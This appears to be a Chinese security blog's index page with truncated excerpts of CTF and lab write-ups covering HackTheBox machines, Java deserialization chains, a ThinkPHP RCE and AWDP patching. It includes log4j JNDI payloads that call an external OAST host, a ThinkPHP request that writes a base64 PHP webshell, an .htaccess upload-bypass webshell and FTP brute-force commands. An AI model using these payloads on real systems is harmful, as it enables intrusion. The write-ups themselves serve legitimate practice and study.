HTB
ps 我个人是在美国的服务器上架设代理,在vps上连接openvpn,然后使用proxifier来转发流量,liunx就用proxychains4,这样虽然比较快,但是端口扫描就只能在服务器上做了常用nmap全端口扫描1nmap -sS -sV 10.129.88.187 -p- -T5 -vv
拿到shell拿到shell后先尝试提权看用户文件而后查看后台进程 ps -aux传fscan扫其他主机的服务
Meow
nmap扫太慢了,拿fscan扫可以发现开启了23端口telnet服务,尝试登陆
1telnet 10.129.150.178
直接root登陆,未授权。
正常可以用msf来爆破
kali自带自带子在1/usr/share/wordlists/legion/
Fawn
FTP存在匿名登陆 匿名账号anonymous
使用msf的ftp login 模块设置好字典,账号密码用空格分隔+1set USERPASS_FILE /usr/share/wordlists/legion/ftp-betterdefaultpasslist.txt
爆破出来后可以用 ...
NSS上的一些java题
[HZNUCTF 2023 final]ezjava
打开靶机其告诉我们会将uri的值计入log,且fastjson的版本为1.2.48首先这个版本的fastjson是不存在我们所俗知的fastjson反序列化漏洞的,其只存在原生反序列化漏洞,而题目说会将内容计入log,着让人想到了log4j的漏洞从jndi注入到log4j注入先尝试以下payload1${jndi:dns://v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现成功进行了dns请求者就证明了此处存在JNDI注入我们再探测以下java版本1${jndi:dns://${sys:java.version}.v73iwpad5ajfj3cacftbwptl7cd31vpk.oastify.com}
可以发现其版本为1.8.0.222这个版本的java是无法直接通过ldap来进行命令执行的而题目说其fastjson的版本为1.2.48.那么我们就可以使用ldap来触发fastjson原生反序列化从而命令 ...
春秋云镜
今天不知道学点什么就氪金打了一下春秋云镜的靶场。只能说我对域的了解几乎为0。这篇文章记录一下域渗透的一些知识,和tp——cve的漏洞成因吧thinkphp5.23rce漏洞再路由随便传参数?s=asdwdwa就会发生报错,通过报错可以发现该think版本为5.23其漏洞payload如下123GET /?s=captcha_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo 'PD9waHAgZXZhbCgkX1BPU1RbMV0pO3BocGluZm8oKTs/Pg==' |base64 -d > shell.php我们直接写马通过哥斯拉来连接
其权限为www-data。我们先进行常规提权。先尝试suid提权并没有发现可以利用的命令再尝试进行sudo提权可以发现我们能够无密码使用mysql我这里贴一个sudo提权的文章Linux提权之Sudo 70种提权方法(上)Linux提权之Sudo 70种提权方法(中)Linux提权之Sudo 7 ...
玄机
蚁剑流量1.木马的连接密码是多少密码为1
2.黑客执行的第一个命令是什么将传参的代码整理一下123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166@ini_set("display_errors", "0");@set_time_l ...
密码实验
仿射密码12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from math import gcddef text_to_numbers(text): return [ord(char) - ord('a') for char in text.lower() if char.isalpha()]def encryption(m, a, b): if gcd(a, 26) != 1: return "密钥a必须与26互质!" numbers = text_to_numbers(m) encrypted_number = [(a * num + b) % 26 for num in numbers] encrypted_text = ''.join(chr(num + ord('a')) for num in encrypted_ ...
awdp
AWDP什么是awdp?AWDP是一种综合考核参赛团队攻击、防御技术能力、即时策略的攻防兼备比赛模式。每个参赛队互为攻击方和防守方,充分体现比赛的实战性、实时性和对抗性,对参赛队的渗透能力和防护能力进行综合全面的考量。
说白了awdp其实就是ctf+漏洞修复罢了。
修复其实就是加waf,预处理,让主办方的payload无法打通修复后的web系统
正常修会比打简单,而且因为awdp是按轮数吃分的,修的越早能吃的分越多,所以一般都先修后打。
常见FIX手段SQL注入:加waf,过滤引号等,php就使用预处理,java若为mybatis就将${}改为#{}
rce :找到rce的点对命令执行的函数人eval,system引号反引号等进行过滤,也可以尝试对这个rce的点进行删除
php反序列化:找到链尾对其进行过滤,在反序列化前进行过滤。在链首部如__wakeup来判断其每个属性是否为类的实例,如果是就exit()
ssrf:一般ssrf都是有伴随着一个强制本地ip的命令执行路由或者文件读取路由,或者就是使用file://这种协议来文件读取,所以在写wa ...
CB链
java.util.PriorityQueue在学CB链之前我们需要回忆一下java.util.PriorityQueue,这个类是我们CC2的入口点。我们回忆一下CC2的链子1java.util.PriorityQueue#readObject->heapify->siftDown->siftDownUsingComparator->TransformingComparator#compare->xxx#transform在CC2中我们就已经知道了PriorityQueue可以调用到xxx.compare而在CB1中也是利用了这个来寻找compare类
commons.beanutilscommons beanutils这个类主要提供了对javabean进行操作的方法,如下其可以通过使用PropertyUtils.getProperty或者PropertyUtils.setProperty,BeanUtils.populate等去使用javabean的get或者set类。如下代码12345678910111213141516171819202122232 ...
java反序列常用方法(持续更新)
序列化反序列化123456789101112131415161718192021222324public static void Serializ(Object obj) throws Exception{ ByteArrayOutputStream bos=new ByteArrayOutputStream(); FileOutputStream fos = new FileOutputStream("ser.bin"); ObjectOutputStream oos=new ObjectOutputStream(bos); oos.writeObject(obj); byte[] byteArray = bos.toByteArray(); Base64.Encoder encoder = Base64.getEncoder(); String base64 = encoder.encodeToString(byteArray); Syste ...
Polar靶场
上传解法挺多的,一开始是发现.htaccess没有被禁止,而且<?被禁了。于是想到了尝试使用.htaccess和无<?马来getshell
12345//a.png<script language="php">eval ($_POST[hihack]);</script>//.htaccessAddType application/x-httpd-php .png
结果发现不行,直接通过.htaccess来使用php解释器来执行png文件,运行<script language="php">eval ($_POST[hihack]);</script>语法好像出现了问题与 .htaccess 相关的奇淫技巧发现可以使用.htaccess来文件包含和使用伪协议来命令执行,但是这个需要有php文件,且尝试发现无法目录穿越问题不大,简单将两个拼在一起即可file被禁可以使用\加换行符来过滤
文件读取123AddType application/x-httpd-php .pngphp_value ...
java-sec-code
简单刷一刷java-sec-code,加强一下各种漏洞在java中的表现sql注入jdbcjdbc其实就是java原生的用于sql查询的类。
攻击12345678910111213141516171819202122232425262728293031323334353637@RequestMapping("/jdbc/vuln")public String jdbc_sqli_vul(@RequestParam("username") String username) { StringBuilder result = new StringBuilder(); try { Class.forName(driver); Connection con = DriverManager.getConnection(url, user, password); if (!con.isClosed()) System.out.println("Connec ...